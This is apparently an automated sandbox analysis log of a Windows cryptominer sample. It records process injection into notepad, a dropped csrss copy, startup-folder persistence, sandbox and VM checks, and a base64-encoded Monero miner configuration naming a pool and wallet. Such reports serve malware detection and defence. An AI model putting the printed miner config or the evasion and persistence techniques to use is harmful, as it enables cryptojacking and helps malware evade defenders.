                        Source: P7Oa6i5muL.exe, 00000000.00000002.217311016.0000000000ABC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenotepad.exe. vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231934971.0000000007EA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDvuwpmnvbghzvmybzii.dll" vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000005.00000002.471130550.0000000003B50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465011248.0000000000A4C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenotepad.exe. vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: OriginalFilenamenotepad.exe. vs P7Oa6i5muL.exe
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                        Source: P7Oa6i5muL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                        Source: classification engineClassification label: mal100.expl.evad.mine.winEXE@25/17@2/4
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,5_2_004080E0
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P7Oa6i5muL.exe.logJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeMutant created: \Sessions\1\BaseNamedObjects\e9c1286a28d82a2d0ee6
                        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4676:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_01
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeFile created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: P7Oa6i5muL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\notepad.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\notepad.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: P7Oa6i5muL.exeVirustotal: Detection: 20%
                        Source: P7Oa6i5muL.exeReversingLabs: Detection: 20%
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeFile read: C:\Users\user\Desktop\P7Oa6i5muL.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\P7Oa6i5muL.exe 'C:\Users\user\Desktop\P7Oa6i5muL.exe'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: P7Oa6i5muL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: P7Oa6i5muL.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: P7Oa6i5muL.exeStatic file information: File size 2241536 > 1048576
                        Source: P7Oa6i5muL.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x208800
                        Source: P7Oa6i5muL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: P7Oa6i5muL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation:

                        barindex
                        Detected unpacking (creates a PE file in dynamic memory)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeUnpacked PE file: 5.2.P7Oa6i5muL.exe.3320000.3.unpack
                        .NET source code contains potential unpackerShow sources
                        Source: P7Oa6i5muL.exe, Bmfkrppdfe/SmsService.cs.Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: P7Oa6i5muL.exe, Bmfkrppdfe/SmsService.cs.Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: P7Oa6i5muL.exe.0.dr, Bmfkrppdfe/SmsService.cs.Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: P7Oa6i5muL.exe.0.dr, Bmfkrppdfe/SmsService.cs.Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 0.0.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs.Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 0.0.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs.Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 0.2.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs.Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 0.2.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs.Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: csrss.5.dr, Bmfkrppdfe/SmsService.cs.Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: csrss.5.dr, Bmfkrppdfe/SmsService.cs.Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 5.2.P7Oa6i5muL.exe.840000.2.unpack, Bmfkrppdfe/SmsService.cs.Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 5.2.P7Oa6i5muL.exe.840000.2.unpack, Bmfkrppdfe/SmsService.cs.Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 5.0.P7Oa6i5muL.exe.840000.0.unpack, Bmfkrppdfe/SmsService.cs.Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: 5.0.P7Oa6i5muL.exe.840000.0.unpack, Bmfkrppdfe/SmsService.cs.Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                        Source: P7Oa6i5muL.exeStatic PE information: 0x91544293 [Sun Apr 7 02:53:07 2047 UTC]
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,5_2_004080E0
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_008B8493 pushfd ; iretd 0_2_008B8494
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_008B86DE push esi; ret 0_2_008B86DF
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_008B67EA push esi; ret 0_2_008B67EB
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_008B862A push FFFFFFD9h; retf 0_2_008B8632
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_008B702D push EE858C9Dh; retf 0_2_008B703D
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_008B7333 push 56C9B3D3h; ret 0_2_008B7359
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeCode function: 0_2_008B736B push esi; ret 0_2_008B7359
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00848493 pushfd ; iretd 5_2_00848494
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_008486DE push esi; ret 5_2_008486DF
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_008467EA push esi; ret 5_2_008467EB
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_0084702D push EE858C9Dh; retf 5_2_0084703D
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_0084862A push FFFFFFD9h; retf 5_2_00848632
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00847333 push 56C9B3D3h; ret 5_2_00847359
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_0084736B push esi; ret 5_2_00847359
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeFile created: C:\ProgramData\LKBNMTFJgl\csrssJump to dropped file
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeFile created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeFile created: C:\ProgramData\LKBNMTFJgl\csrssJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeFile created: C:\ProgramData\LKBNMTFJgl\csrssJump to dropped file
                        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.urlJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.urlJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\notepad.exeWindow / User API: threadDelayed 9995Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe TID: 5944Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe TID: 4464Thread sleep count: 53 > 30Jump to behavior
                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe TID: 4464Thread sleep time: -106000s >= -30000sJump to behavior
                        Source: C:\Windows\notepad.exe TID: 5064Thread sleep count: 9995 > 30Jump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 4060Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 5700Thread sleep time: -270000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeCode function: 5_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,5_2_00403CA0
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: P7Oa6i5muL.exe, 00000005.00000002.466131413.0000000001100000.00000004.00000020.sdmpBinary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==d5 h
                        Source: svchost.exe, 0000000B.00000002.468387389.0000023808662000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
